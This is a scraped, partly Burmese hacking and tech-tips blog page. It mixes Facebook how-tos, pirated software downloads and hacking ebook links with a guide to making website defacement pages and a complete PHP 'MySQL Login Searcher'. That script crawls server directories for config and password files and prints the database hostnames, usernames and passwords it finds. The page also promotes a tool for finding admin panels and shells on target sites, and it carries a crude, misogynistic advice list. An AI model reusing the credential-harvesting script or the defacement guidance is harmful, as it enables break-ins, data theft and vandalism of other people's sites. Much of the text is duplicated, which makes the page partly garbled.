Youtube ကvideoကိုgifformatေျပာင္းခ်င္ရင္ေတာ့ဒီဆိုဒ္ေလးကိုသြားပါ...အဲဒီမွာမိမိျကိဳက္တာတင္ျပီးေတာ့လည္း
format ေျပာင္းႏိူင္ပါတယ္္file ေတြကိုလည္းပို့ေပးႏိူင္ပါတယ္.အရမ္းေကာင္းပါတယ္.လုပ္ပံုကလြယ္လို့
ေျပာမျပေတာ့ပါဘူး
http://www.zamzar.com/
How to Leave Unwanted Facebook Groups From Home Page
7:01 AM
Facebook က groupေတြမွာဆက္သြယ္ထားျပီးျပန္ျပီးထြက္ခ်င္ရင္ေတာ့ Facebookကို၀င္ပါျပီးရင္group seesionကိုရွာပါHomePageရဲ့ဘယ္ဘက္မွာပါ.အဲဒီကသင္ထြက္ခ်င္တဲ့groupေဘးနားကိုသြားပါ
ခံတဲပံုေလးေတြ့ပါလိမ့္မယ္.အဲဒါကိုႏိွပ္လုိ္က္ပါဒါဆိုpopupboxေလးေပၚလာပါလိမ့္မယ္အဲဒီက
LeaveGroupကိုႏိွပ္ပါ.ျပီးရင္ထပ္ျပီးpopup boxေပၚလာပါလိမ့္ဦးမယ္အဲဒီက Leave Groupပဲႏိွပ္ပါဒါဆိုမိမိကအဲဒီgroupကထြက္ျပီးသားျဖစ္သြားပါျပီ..
ခံတဲပံုေလးေတြ့ပါလိမ့္မယ္.အဲဒါကိုႏိွပ္လုိ္က္ပါဒါဆိုpopupboxေလးေပၚလာပါလိမ့္မယ္အဲဒီက
LeaveGroupကိုႏိွပ္ပါ.ျပီးရင္ထပ္ျပီးpopup boxေပၚလာပါလိမ့္ဦးမယ္အဲဒီက Leave Groupပဲႏိွပ္ပါဒါဆိုမိမိကအဲဒီgroupကထြက္ျပီးသားျဖစ္သြားပါျပီ..
Labels:
Facebook Knowledge
Get 10 GB More Space In Computer By Gmail
6:06 AM
ပထမဆံုးGmail Drive ကိုေဒါင္းပါ.
Download
ျပီးရင္ေတာ့runလုိက္ပါrunျပီးရင္ေတာ့My Computerထဲကိုသြားလုိက္ပါ GmailDriveဆိုျပီးေတြ့ပါလိမ့္မယ္အဲဒါကိုႏိွပ္လုိက္ပါ.အဲဒီမွာေမးပါလိမ့္မယ္သင္ရဲ့gmail account ရဲ့username&passwordရယ္ကိုအဲဒီမွာမိမိdriveလုပ္ခ်င္တဲ့အေကာင့္ကိုရိုက္ထည့္လိုက္ပါ.ဒါဆိုရင္ေတာ့drive
တစ္ခုကိုဖန္တိီးျပီးပါျပီ.သင္ဟာအေကာင့္ကိုႏွစ္ခု၊သံဳးခုရိုက္ထည့္ျပီးသံုးႏိူင္ပါတယ္
Download
ျပီးရင္ေတာ့runလုိက္ပါrunျပီးရင္ေတာ့My Computerထဲကိုသြားလုိက္ပါ GmailDriveဆိုျပီးေတြ့ပါလိမ့္မယ္အဲဒါကိုႏိွပ္လုိက္ပါ.အဲဒီမွာေမးပါလိမ့္မယ္သင္ရဲ့gmail account ရဲ့username&passwordရယ္ကိုအဲဒီမွာမိမိdriveလုပ္ခ်င္တဲ့အေကာင့္ကိုရိုက္ထည့္လိုက္ပါ.ဒါဆိုရင္ေတာ့drive
တစ္ခုကိုဖန္တိီးျပီးပါျပီ.သင္ဟာအေကာင့္ကိုႏွစ္ခု၊သံဳးခုရိုက္ထည့္ျပီးသံုးႏိူင္ပါတယ္
Labels:
Gmail Knowledge,
Knowledge,
softwares
The Secrets of a Super Hacker Free Ebook Download.
8:23 AM
Step-by-Step illustrated details on the techniques used by Hackers to Get Your Data including :-
Guessing Passwords, Stealing Passwords, Password Lists, Social Engineering, Reverse Social Engineering, Crashing Electronic Bulletin Boards, Dummy Screens, Fake E-mails, Trojan Horses , Viruses, Worms, Trap Doors, And Much More...Anyone concerned with Computer Security and Data Privacy needs to Read this Ebook.Given Below is the Table of Contents of Secrets of a Super Hacker.
Introduction : Heroes or Villains?
Part I : Before Hack.
1. The Basics.
2. The History of Hacking.
3. Researching the Hack.
4. Passwords and Access Controls.
5. Social Engineering.
6. Reverse Social Engineering.
Part II : During Hack.
7. Public Access Computers and Terminals.
8. On-Site Hacking - The Trespasser Hacker.
9. Hacking At Home - Dialing Up Computers with your Modem
10. Electronic Bulletin Board System.
11. Borderline Hacking.
12. What To Do When Inside?
Part III : After Hack.
13. This Lawful Land.
14. Hacker Security : How to Keep From Getting Caught.
15. Conclusion.
Download
Guessing Passwords, Stealing Passwords, Password Lists, Social Engineering, Reverse Social Engineering, Crashing Electronic Bulletin Boards, Dummy Screens, Fake E-mails, Trojan Horses , Viruses, Worms, Trap Doors, And Much More...Anyone concerned with Computer Security and Data Privacy needs to Read this Ebook.Given Below is the Table of Contents of Secrets of a Super Hacker.
Introduction : Heroes or Villains?
Part I : Before Hack.
1. The Basics.
2. The History of Hacking.
3. Researching the Hack.
4. Passwords and Access Controls.
5. Social Engineering.
6. Reverse Social Engineering.
Part II : During Hack.
7. Public Access Computers and Terminals.
8. On-Site Hacking - The Trespasser Hacker.
9. Hacking At Home - Dialing Up Computers with your Modem
10. Electronic Bulletin Board System.
11. Borderline Hacking.
12. What To Do When Inside?
Part III : After Hack.
13. This Lawful Land.
14. Hacker Security : How to Keep From Getting Caught.
15. Conclusion.
Download
Labels:
Ebooks
Hack Attacks Testing Free Ebook Download.
8:15 AMA Network Security Breach (a Hack, Crack, Or other Invasion) occurs when unauthorized access to the Network is achieved and Havoc Results.The Best possible defense is ans offensive strategy that allows you to Regularly Test your Network to Reveal the Vulnerabilities and Close the Holes before Someone Gets In.
Hack Attacks Testing explains How to Perform Your Own Security Audits.
Hack Attacks Testing is a Useful Ebook for those Who own a Website and want to Secure their Sites from Latest Vulnerabilities and Discover Vulnerabilities on their own.
Given Below is the Table of Contents of Hack Attacks Testing.
Acknowledgments.
Introduction.
Part I : Building a Multisystem Tiger Box.
1. Basic Windows 2000/Windows 2000 Server Installation and Configuration.
2. Basic Linux and Solaris Installation and Configurations.
3. Mac OS X Tiger Box Solutions.
4. Installing and Configuring a Testing Target.
Part II : Using Security Analysis Tools for Your Windows-Based Tiger Box Operating System.
5. Cerberus Internet Scanner.
Hack Attacks Testing explains How to Perform Your Own Security Audits.
Hack Attacks Testing is a Useful Ebook for those Who own a Website and want to Secure their Sites from Latest Vulnerabilities and Discover Vulnerabilities on their own.
Given Below is the Table of Contents of Hack Attacks Testing.
Acknowledgments.
Introduction.
Part I : Building a Multisystem Tiger Box.
1. Basic Windows 2000/Windows 2000 Server Installation and Configuration.
2. Basic Linux and Solaris Installation and Configurations.
3. Mac OS X Tiger Box Solutions.
4. Installing and Configuring a Testing Target.
Part II : Using Security Analysis Tools for Your Windows-Based Tiger Box Operating System.
5. Cerberus Internet Scanner.
6. CyberCop Scanner.
7. Internet Scanner.
8. Security Threat Avoidance Technology Scanner.
9. TigerSuite 4.0.
Part III : Using Security Analysis Tools for *NIX and Mac OS X.
10. Hping/2.
11. Nessus Security Scanner.
12. Nmap.
13. SAINT.
14. SARA.
Part IV : Vulnerability Assessment.
15. Comparative Analysis.
16. Appendix A : Linux/Unix Shortcuts and Commands.
17. Appendix B : Whats on the CD-ROM.
Download
7. Internet Scanner.
8. Security Threat Avoidance Technology Scanner.
9. TigerSuite 4.0.
Part III : Using Security Analysis Tools for *NIX and Mac OS X.
10. Hping/2.
11. Nessus Security Scanner.
12. Nmap.
13. SAINT.
14. SARA.
Part IV : Vulnerability Assessment.
15. Comparative Analysis.
16. Appendix A : Linux/Unix Shortcuts and Commands.
17. Appendix B : Whats on the CD-ROM.
Download
Labels:
Ebooks
Life Hacking E-BOOK [Interesting]
7:43 AMTopic's
Social
Alcohol and Bar etiquette
Autos and Driving
Cleanliness and Hygiene
Computers and electronics
Kitchen and Culinary arts
Games and Sports
Remedies and Cures
Paranoia and Security
School, Jobs and Language
Stains and Smells
Miscellaneous Advice
Keeping your money
Life the universe and everything
Make life easy
Make life easy
1)You are NOT a philosopher.
2) If someone offers you to use a public toilet before them, DO IT, it means he's gonna drop a
bombshell in there.
3) Don't pay for every girl you go out with, that's just stupid.
4) Do what YOU want, not what THE WORLD wants you to do.
5) Accept who you are, you aren't changing soon.
6) Even if she looks 18, she might not be.
7) DON'T keep messaging a girl every few hours, girls don't like clingy guys.
8) Girls don't like guys who BAWWW alot, or try to get pity. Be happy.
9) If you find money on the street, IT'S YOURS, DON'T HAND IT IN ANYWHERE.
10) Everything people do in life is self motivated, nobody "does stuff to be kind".
11)CHECK YOUR PAYSLIPS; people like to fuck you over for money
12) Don't try Internet dating at all; it fails no matter what people say.
13) Accept that not everyone in life has to fit into a stereotype.
14) Your highschool marks don't mean shit in later life, have fun.
15) High School years ARE the BEST in your life, again, don't stress through them.
16) Don't feel pressured to be in a relationship because all of your friends are in them, they aren't
super awesome.
17) Sex IS overrated, you get your dick wet, there is no need to become so desperate for it.
18) Do not sleep on the floor naked when you have animals in the house
19) Do NOT fap into underwear and leave them around, your mother can tell.
20) At the store, just because it says buy 2 get 1 free, it isn't SAVING YOU MONEY if you DON'T
NEED IT.
21)No matter who you vote for, they are still gonna fuck you in the ass with their policies no matter
what.
22) Just because the media and government tell you something, doesn't mean it's always true.
23) Do not add "friends of friends" on facebook that you haven't spoken to before. Shit's just creepy.
24) Just because a girl is talking to you, doesn't mean she wants your dick in her mouth.This is the first 24/160 in the TOPIC Make life easy.
Download
Labels:
Ebooks
On-line Scanner Tool For Web Application Security
7:17 AM
Online Scanner Tool ေလးေတြပါ..မိမိဆိုဒ္ကို security testingလုပ္ခ်င္ရင္ေတာ့ ဒီဆိုဒ္ေတြမွာသြားစစ္လို့ရပါတယ္.
Labels:
Web Hacking,
Web Security
Dangerous Google Searching Ebook
6:57 AM
ဒီစာအုပ္ေလးကေတာ့Google Search Engine ထဲမွာSearch for secrets ဆိုတဲ့အတိုင္းပဲလ်ိဳ့၀ွက္ခ်က္ေတြကိုလုိက္ရွာတဲ့နည္းလမ္းေတြကိုေဖာ္ျပထားတဲ့စာအုပ္ေလးပဲျဖစ္ပါတယ္...
- How to Use Google to find Sources of Personal Data and other Confidential Data.
- How to Find Information about Vulnerable Systems and Web Services.
- How to Locate Publicly available Network Using Google.
- Use of Google Dorks.
- And Much More...
- Download
Labels:
Ebooks
Facebook All New Cool Chat Emotions Codes
7:48 AM
Facebook emotions code ေလးေတြပါ..........ကူးယူျပီးမိမိသူငယ္ခ်င္းဆီပို့ႏိူင္ပါတယ္
[[f9.laugh]]
[[f9.sad]]
[[f9.angry]]
[[f9.sleepy]]
[[f9.shock]]
[[f9.kiss]]
[[f9.inlove]]
[[f9.pizza]]
[[f9.coffee]]
[[f9.rain]]
[[f9.bomb]]
[[f9.sun]]
[[f9.heart]]
[[f9.heartbreak]]
[[f9.doctor]]
[[f9.ghost]]
[[f9.brb]]
[[f9.wine]]
[[f9.gift]]
[[f9.adore]]
[[f9.angel]]
[[f9.baloons]]
[[f9.bowl]]
[[f9.cake]]
[[f9.callme]]
[[f9.clap]]
[[f9.confused]]
[[f9.curllip]]
[[f9.devilface]]
[[f9.lying]]
[[f9.rofl]]
[[f9.billiard]]
[[f9.cakepiece]]
[[f9.rosedown]]
[[f9.shutmouth]]
[[f9.shy]]
[[f9.silly]]
[[f9.tongue1]]
[[f9.fastfood]]
[[f9.ring]]
[[f9.plate]]
[[f9.candle]]
[[f9.party]]
Labels:
Facebook Knowledge
Download Glary Utilities PRO 2.35 Full Version
7:30 AM
Computer တစ္လံုးအတြက္Utilitiesတစ္ခုဟာမရိွမျဖစ္လိုအပ္ပါတယ္........ဒီGlary Utilities ကregistry and disk cleaning, privacy protection, performance accelerator and amazing multifunctional tools တစ္ခုျဖစ္ပါတယ္.dogged registry errors, wipe off clutters, optimize internet speed, safeguard confidential files and maintain maximum performance တို့ကိုလည္းfix လုပ္ႏိူင္ပါတယ္.
Glary Utilities PRO 2.35 Features:
- Automatic care in background
- Optimize, clean and boost the speed of your Windows.
- Protect your privacy and security.
- Block spyware, trojans, adware, etc.
- Fix certain application errors.
- Simple, fast and User friendly interface
- Much much more powerful utilities
- Download
Labels:
Utilities Tools
Download Total Video Converter TVC 3.71 + Serial Full Version
7:17 AM
Total Video Converter softwareေလးပါ Full Versionေပါ့....
Total Video Converter 3.71 Features:
Total Video Converter 3.71 Features:
- Integrate into Windows Explorer with context menu.
- Add a brand new Skin.
- Fully support Windows 7.
- Convert all kinds of videos to mobile videos or audios (mp4, 3gp, xvid, divx mpeg4 avi, amr audio) which are used by cell-phone, PDA, PSP, iPod, iPhone, Xbox360, PS3 etc.;
- Photos slide show combines multi-photos and musics with more than 300 photos fantasy transition effect;
- High compatibility and high efficiency for Importing RMVB or RM video/audio;
- Convert various videos to MPEG videos compatible with standard DVD/SVCD/VCD;
- Burn the converted videos to DVD/SVCD/VCD;
- Rip DVD to popular videos of all sorts;
- Extract audio from various of videos and convert which to all kinds of audios (mp3, ac3, ogg, wav, aac);
- RIP CD to audios of all sorts directly;
- Support using with command line;
- Combine several video and audio files to one video file;
- Demultiplex or extract video and audio;
- Multiplex video and audio to one file;
- Flv Nelly Mosser audio extract and decode.
- Download
Top Directories For Your Website Submission
2:21 AM
သင့္ဆိုဒ္ကို search engine ေတြမွာbest submission directoriesလုပ္ခ်င္ရင္ေတာ့ဒီဆိုဒ္ေတြကအေကာင္းဆံုးပါပဲ
- Submit to Google
- Submit to Yahoo
- Submit to Bing
- Submit To DMOZ (Multilingual Directory)
- Submit to Addme
- Submit to Freeaddurl
- Submit to Websitesubmit
- Submit to Sitesubmiturl
Labels:
Web Link,
Web Security
How to post animated GIF images on your Facebook Wall
2:15 AM
Facebook မွာanimated ပံုေလးေတြတင္ခ်င္ရင္ေတာ့ Animated Picture app ကိုသြားပါအဲဒီကGo to Appကိုႏိွပ္ပါ
.ဒါဆိုရင္animated စာမ်က္ႏွာကိုေရာက္သြားပါျပီ အဲဒီမွာမိမိျကိဳက္တဲ့ပံုလည္းတင္လို့ရတယ္.ျပီးေတာ့သူ့မွာပါျပီးသားပံုေတြကိုလညး္တင္လို့ရပါတယ္..သီခ်င္းလည္း
တင္ခ်င္ရင္ရပါတယ္..ျပီးရင္ေတာ့share လုပ္လုိ့ရပါတယ္.......
.ဒါဆိုရင္animated စာမ်က္ႏွာကိုေရာက္သြားပါျပီ အဲဒီမွာမိမိျကိဳက္တဲ့ပံုလည္းတင္လို့ရတယ္.ျပီးေတာ့သူ့မွာပါျပီးသားပံုေတြကိုလညး္တင္လို့ရပါတယ္..သီခ်င္းလည္း
တင္ခ်င္ရင္ရပါတယ္..ျပီးရင္ေတာ့share လုပ္လုိ့ရပါတယ္.......
Labels:
Facebook Knowledge
What Is Defacement ? How To Make Your Own Deface Page?
1:57 AM
Website ေတြမွာDeface တင္နည္းေလးကိုတိုက္ရိုက္ပဲကူးတင္လုိက္ပါတယ္.........အသံဳး၀င္မွာပါ.
What Is Website Defacement ?
A website defacement is the substitution of the original home page by a system hacker that breaks into a web server and alters the hosted website creating one of his own.
How To Deface any websites ?
There are a number of things that will work. Really depends on the type of website you’re trying to hack and what software they’re running. Servers aren’t especially secure. Later and very soon I’ll post lot of cool tricks for both script kiddies and elite hackers that how to deface any kind of websites.
How To Make Deface Page ?
I bet you if you are really an interested noob or hacker then you must seen some of cool deface page but unfortunately you may don’t know how to make them.Today I’ll tell you how to make a cool deface page.
All deface page are made of code and most of them are made of HTML code.If you don’t know coding then you may not able to make a cool and different types of deface page .I guess you know nothing about any of them .So, I’ll to help you out here.
1.Collecting HTML Code from anywhere and edit them :
You can just google for deface page’s code.You’ll get lot of them and then you can edit them as you want.Here I’m giving you some defacement code with live demo .You can download and edit them if you want so
(i).Normal Defacement :
Live Demo | Download
(ii).Dancing Defacement With Animated & Back ground Image:
Live Demo | Download
(iii).Scroll Defacement:
Live Demo | Download
(iv).Defacement With Matrix:
Live Demo | Download
(v).Defacement With Music :
Live Demo | Download
2.By Software :
There are some software also available to make a deface page .Just download any software and customize your deface page.
(i).Deface Page Generator :
1.Download the software from here.
2.Extract it and run it.
Now you’ll see as like the image below.
3.Now follow the steps below to create your own deface page !
Step 1: Copy and paste your you tube video’s ID that you want to show in your deface page.
Step 2: Here you’ll write your nick or code name like “Hacked by —”
Step 3 & 4 : Hence write down some of your own quotes.
Step 5 : Just write down your message there as I showed in the image above.
Step 6: Now click on the Generate button and Save it with .html extensions like funsofts.html
4.And you are done!
(ii)Deface Page Generator (Version 1.0):
There is one more updated version available of Deface Page Generator.
1.Download Deface Page Generator V1.0 from here.
2.Just fill in the blank step by step as you want and click on the Generate button then Copy and Save it in notepad with .html extensions.
3.HN Deface Page Maker:
This software’s language is not in English .So, you better get help from Google translator to customize it properly
Download HN Deface Page Maker from here.
4.Deface Page Created :
This is really a cool soft for newbies .You can add background picture , sound and some running text also.Both two versions are available in this tool.Just use it as you want .
Download Deface Page Created both versions from here.
Now I can hope that I helped my readers to make a new and their own deface page
What Is Website Defacement ?
A website defacement is the substitution of the original home page by a system hacker that breaks into a web server and alters the hosted website creating one of his own.
How To Deface any websites ?
There are a number of things that will work. Really depends on the type of website you’re trying to hack and what software they’re running. Servers aren’t especially secure. Later and very soon I’ll post lot of cool tricks for both script kiddies and elite hackers that how to deface any kind of websites.
How To Make Deface Page ?
I bet you if you are really an interested noob or hacker then you must seen some of cool deface page but unfortunately you may don’t know how to make them.Today I’ll tell you how to make a cool deface page.
All deface page are made of code and most of them are made of HTML code.If you don’t know coding then you may not able to make a cool and different types of deface page .I guess you know nothing about any of them .So, I’ll to help you out here.
1.Collecting HTML Code from anywhere and edit them :
You can just google for deface page’s code.You’ll get lot of them and then you can edit them as you want.Here I’m giving you some defacement code with live demo .You can download and edit them if you want so
(i).Normal Defacement :
Live Demo | Download
(ii).Dancing Defacement With Animated & Back ground Image:
Live Demo | Download
(iii).Scroll Defacement:
Live Demo | Download
(iv).Defacement With Matrix:
Live Demo | Download
(v).Defacement With Music :
Live Demo | Download
2.By Software :
There are some software also available to make a deface page .Just download any software and customize your deface page.
(i).Deface Page Generator :
1.Download the software from here.
2.Extract it and run it.
Now you’ll see as like the image below.
3.Now follow the steps below to create your own deface page !
Step 1: Copy and paste your you tube video’s ID that you want to show in your deface page.
Step 2: Here you’ll write your nick or code name like “Hacked by —”
Step 3 & 4 : Hence write down some of your own quotes.
Step 5 : Just write down your message there as I showed in the image above.
Step 6: Now click on the Generate button and Save it with .html extensions like funsofts.html
4.And you are done!
(ii)Deface Page Generator (Version 1.0):
There is one more updated version available of Deface Page Generator.
1.Download Deface Page Generator V1.0 from here.
2.Just fill in the blank step by step as you want and click on the Generate button then Copy and Save it in notepad with .html extensions.
3.HN Deface Page Maker:
This software’s language is not in English .So, you better get help from Google translator to customize it properly
Download HN Deface Page Maker from here.
4.Deface Page Created :
This is really a cool soft for newbies .You can add background picture , sound and some running text also.Both two versions are available in this tool.Just use it as you want .
Download Deface Page Created both versions from here.
Now I can hope that I helped my readers to make a new and their own deface page
Labels:
Hacking Tools,
Web Hacking,
Web Hacking Tools
Ebooks ေတြပါ........
1:52 AM
Introduction HTML5 2nd Edition ေလးပါ...........
Download
Hacking Exposed စာအုပ္ေလးပါ...........
Download
Download
Hacking Exposed စာအုပ္ေလးပါ...........
Download
Labels:
Ebooks
[PHP] MySQL Login Searcher
1:17 AM
Php My SQL login searcher code ေလးပါ.....
<?php
$backwards_depth = 2; // how many directories to step backwards
$forward_depth = 4; // amount of dirs to recursively search forwards
backstep($backwards_depth);
getMysql($forward_depth);
function backstep($amount) {
for($i = 0; $i < $amount; $i++) {
if(@is_readable("..")) chdir("..");
else return $i;
}
}
function getMysql($depth)
{
echo "<h3>MySQL Logins:</h3>"; // hail the almighty regular expression
$files = findFile($depth, getcwd(), "*config*|*.conf|*database*|*passwd*|*password*", ".gif|.jpg|.png|.htm|.js|template|forgot|remind|new|change|lib|sample|install", "read");
foreach($files as $path) {
$dbinfo = false;
$contents = file($path);
foreach($contents as $line) {
$line = trim($line); // make sure its useful and remove comments
if($line[0] != '$' && strpos(strtolower($line), "define(") === false) continue;
if(strpos($line, "//") !== false) $line = substr($line, 0, strpos($line, "//"));
else if(strpos($line, "/*") !== false) $line = substr($line, 0, strpos($line, "/*"));
else if(strpos($line, "#") !== false) $line = substr($line, 0, strpos($line, "#"));
// parse out the db info
if(strpos(strtolower($line), "host") !== false) $dbinfo .= $line.'<br>';
else if(strpos(strtolower($line), "user") !== false) $dbinfo .= $line.'<br>';
else if(strpos(strtolower($line), "pass") !== false) $dbinfo .= $line.'<br>';
}
if($dbinfo != false) echo "<font color=green>".$path."</font>:<br>".$dbinfo.'<br>';
}
}
function findFile($find_depth, $find_startfrom, $find_query, $find_reject, $find_perms)
{
$startdir = getcwd();
chdir($find_startfrom);
if($find_query == "") return -1;
else {
$query = explode("|", $find_query);
$query_len = count($query) - 1;
}
if($find_reject == "") $reject_len = -1; else {
$reject = explode("|", $find_reject);
$reject_len = count($reject) - 1;
}
if($find_perms == "read") $perms = 0;
else if($find_perms == "write") $perms = 1;
else if($find_perms == "execute") $perms = 2;
else if($find_perms == "setuid") $perms = 3;
$depth_dir = "";
$matches;
$match = true;
$x = 0;
while($x <= $find_depth) {
$y = 0;
while($y <= $query_len) {
$search = $depth_dir.$query[$y];
$files = glob($search);
if(!is_array($files)) break;
foreach($files as $possible_file) {
if($reject_len != -1) {
$z = 0;
while($z <= $reject_len) {
if(strpos($possible_file, $reject[$z])) {
$match = false;
break;
}
$z++;
}
}
if($perms == 0) if(!is_readable($possible_file)) $match = false;
else if($perms == 1) if(!is_writeable($possible_file)) $match = false;
else if($perms == 2) if(!is_executable($possible_file)) $match = false;
else if($perms == 3) {
$setuid = floor(fileperms($possible_file) / 1000);
if(!is_executable($possible_file)) $match = false;
if($setuid != 1 && $setuid != 2 && $setuid != 4 && $setuid != 6) $match = false;
}
if($match == true) $matches[] = $find_startfrom.DIRECTORY_SEPARATOR.$possible_file;
$match = true;
}
$y++;
}
$x++;
$depth_dir .= '*'.DIRECTORY_SEPARATOR;
}
chdir($startdir);
return $matches;
}
?>
<?php
$backwards_depth = 2; // how many directories to step backwards
$forward_depth = 4; // amount of dirs to recursively search forwards
backstep($backwards_depth);
getMysql($forward_depth);
function backstep($amount) {
for($i = 0; $i < $amount; $i++) {
if(@is_readable("..")) chdir("..");
else return $i;
}
}
function getMysql($depth)
{
echo "<h3>MySQL Logins:</h3>"; // hail the almighty regular expression
$files = findFile($depth, getcwd(), "*config*|*.conf|*database*|*passwd*|*password*", ".gif|.jpg|.png|.htm|.js|template|forgot|remind|new|change|lib|sample|install", "read");
foreach($files as $path) {
$dbinfo = false;
$contents = file($path);
foreach($contents as $line) {
$line = trim($line); // make sure its useful and remove comments
if($line[0] != '$' && strpos(strtolower($line), "define(") === false) continue;
if(strpos($line, "//") !== false) $line = substr($line, 0, strpos($line, "//"));
else if(strpos($line, "/*") !== false) $line = substr($line, 0, strpos($line, "/*"));
else if(strpos($line, "#") !== false) $line = substr($line, 0, strpos($line, "#"));
// parse out the db info
if(strpos(strtolower($line), "host") !== false) $dbinfo .= $line.'<br>';
else if(strpos(strtolower($line), "user") !== false) $dbinfo .= $line.'<br>';
else if(strpos(strtolower($line), "pass") !== false) $dbinfo .= $line.'<br>';
}
if($dbinfo != false) echo "<font color=green>".$path."</font>:<br>".$dbinfo.'<br>';
}
}
function findFile($find_depth, $find_startfrom, $find_query, $find_reject, $find_perms)
{
$startdir = getcwd();
chdir($find_startfrom);
if($find_query == "") return -1;
else {
$query = explode("|", $find_query);
$query_len = count($query) - 1;
}
if($find_reject == "") $reject_len = -1; else {
$reject = explode("|", $find_reject);
$reject_len = count($reject) - 1;
}
if($find_perms == "read") $perms = 0;
else if($find_perms == "write") $perms = 1;
else if($find_perms == "execute") $perms = 2;
else if($find_perms == "setuid") $perms = 3;
$depth_dir = "";
$matches;
$match = true;
$x = 0;
while($x <= $find_depth) {
$y = 0;
while($y <= $query_len) {
$search = $depth_dir.$query[$y];
$files = glob($search);
if(!is_array($files)) break;
foreach($files as $possible_file) {
if($reject_len != -1) {
$z = 0;
while($z <= $reject_len) {
if(strpos($possible_file, $reject[$z])) {
$match = false;
break;
}
$z++;
}
}
if($perms == 0) if(!is_readable($possible_file)) $match = false;
else if($perms == 1) if(!is_writeable($possible_file)) $match = false;
else if($perms == 2) if(!is_executable($possible_file)) $match = false;
else if($perms == 3) {
$setuid = floor(fileperms($possible_file) / 1000);
if(!is_executable($possible_file)) $match = false;
if($setuid != 1 && $setuid != 2 && $setuid != 4 && $setuid != 6) $match = false;
}
if($match == true) $matches[] = $find_startfrom.DIRECTORY_SEPARATOR.$possible_file;
$match = true;
}
$y++;
}
$x++;
$depth_dir .= '*'.DIRECTORY_SEPARATOR;
}
chdir($startdir);
return $matches;
}
?>
Labels:
Sql Injection,
Web Hacking
How to Control Facebook Notifications Direct From Notification Bar
1:12 AM
Facebook ဟာလူသိမ်ားတဲ့ Social Site တစ္ခုပါ..သူ့မွာ notifications feature ေတြပါပါတယ္...update news ကိုသိရေအာင္အတြက္ပါ.....မိမိကfacebook မွာေထာင္ထားတဲ့group ကိုဆက္သြယ္ထားရင္ေတာ့.သူ့မွာအသစ္ေရးသမ်ွေတြဟာမိမိfbရဲ့notifications မွာေပၚေနမွာျဖစ္ပါတယ္..မေပၚေစခ်င္ရင္ေတာ့..notification bottom ေလးကိုႏိွပ္ပါ.
ပံုမွာျပထားတဲ့အတိုင္း (x)သေကၤတေလးကိုႏိွပ္လိုက္ပါ.ဒါဆိုေမးပါလိမ့္မယ္.Turn Off လုပ္မွာလားလို့.Turn OFf bottomကိုႏိွပ္လိုက္ပါ.
ဒါဆိုမိမိturn off လုပ္လိုက္တဲ့groupကေနျပီးေတာ့notifications ကိုဘယ္ေတာ့မွျမင္ရေတာ့မွာမဟုတ္ပါဘူး
ပံုမွာျပထားတဲ့အတိုင္း (x)သေကၤတေလးကိုႏိွပ္လိုက္ပါ.ဒါဆိုေမးပါလိမ့္မယ္.Turn Off လုပ္မွာလားလို့.Turn OFf bottomကိုႏိွပ္လိုက္ပါ.
ဒါဆိုမိမိturn off လုပ္လိုက္တဲ့groupကေနျပီးေတာ့notifications ကိုဘယ္ေတာ့မွျမင္ရေတာ့မွာမဟုတ္ပါဘူး
Labels:
Facebook Knowledge
Password Generator Software
12:55 AM
ဒီsoftware ေလးဟာ password generator ေလးပါ....မိမိpassword ကိုhacking အလုပ္မခံရႏိူင္passwordေတြကို password generator နဲ့ဖန္တီးလုိ့ရပါတယ္.........
Download
Download
Labels:
Password Generator,
softwares
Hacking Email Accounts
12:30 AM
ဒီHacking Email accounts စာအုပ္ကလည္းေတာ္ေတာ္ေလးေကာင္းပါတယ္.....
Download
Download
Labels:
Ebooks
Google Hack Ebook.pdf
12:29 AM
Google Hack Ebook ေလးဟာအရမ္းေကာင္းပါတယ္..Englishလိုျဖစ္ပါတယ္.......
.ျကိဳက္တဲ့သူေဒါင္းႏိူင္ပါတယ္.....
Download
.ျကိဳက္တဲ့သူေဒါင္းႏိူင္ပါတယ္.....
Download
Labels:
Ebooks
Shell,Admin Panel & Zip Finder
12:25 AM
ဒီtool ေလးဟာAdmin Panel And Zip files and shellsေတြကိုရွာေဖြေပးႏူိင္ပါတယ္...websiteေတြကေနျပီးေတာ့.target site ထည့္ျပီးေတာ့သံုးခုထဲကတစ္ခုကိုေရြးျပီးStart ကိုႏိွပ္ျပီးသံုးႏူိင္ပါတယ္.....
Download
Download
Labels:
Hacking Tools
Facebook Chat with A to Z Color Code............
12:02 AM
Facebook မွာသူငယ္ခ်င္းေတြကိုchatbox ကေနျပီးေတာ့.colour code ေလးေတြနဲ့A to Z ကိုရိုက္ျပီးေျပာခ်င္ရင္ေအာက္မွာကူးျပီးေျပာလုိ့ရပါတယ္........
ဥပမာ;HELLO ကိုေျပာခ်င္ရင္ဒီတိုင္းေလးကူးေျပာလုိက္ပါ.
[[289456361100595]] [[324603680890957]][[330554750305956]] [[330554750305956]] [[347010495314863]]
First Color Text Set :
[[295327000505245]]= A
[[220318834713353]] = B
[[144560332320347]] = C
[[307797775927138]] = D
[[324603680890957]] = E
[[299734803403698]] = F
[[258412604222012]] = G
[[289456361100595]] = H
[[348051601876152]] = I
[[303266456385232]] = J
[[340869882605657]] = K
[[330554750305956]] = L
[[329961400365132]] = M
[[158558324248717]] = N
[[347010495314863]] = O
[[267188070003737]] = P
[[248037205261849]] = Q
[[294252217292321]] = R
[[269636683095081]] = S
[[276867469029912]] = T
[[334919309870510]] = U
[[331041810248882]] = V
[[206218662800583]] = W
[[244960698906593]] = X
[[120548588062562]] = Y
[[336009086426836]] = Z
SECOND COLOR TEXT SET:
[[107015582669715]] = A
[[116067591741123]] = B
[[115602405121532]] = C
[[112542438763744]] = D
[[115430438474268]] = E
[[109225112442557]] = F
[[111532845537326]] = G
[[111356865552629]] = H
[[109294689102123]] = I
[[126362660720793]] = J
[[116651741681944]] = K
[[115807951764667]] = L
[[106596672714242]] = M
[[108634132504932]] = N
[[116564658357124]] = O
[[111669128857397]] = P
[[107061805996548]] = Q
[[106699962703083]] = R
[[115927268419031]] = S
[[112669162092780]] = T
[[108983579135532]] = U
[[107023745999320]] = V
[[106678406038354]] = W
[[116740548336581]] = X
[[112416755444217]] = Y
[[165724910215]] = Z
ဥပမာ;HELLO ကိုေျပာခ်င္ရင္ဒီတိုင္းေလးကူးေျပာလုိက္ပါ.
[[289456361100595]] [[324603680890957]][[330554750305956]] [[330554750305956]] [[347010495314863]]
First Color Text Set :
[[295327000505245]]= A
[[220318834713353]] = B
[[144560332320347]] = C
[[307797775927138]] = D
[[324603680890957]] = E
[[299734803403698]] = F
[[258412604222012]] = G
[[289456361100595]] = H
[[348051601876152]] = I
[[303266456385232]] = J
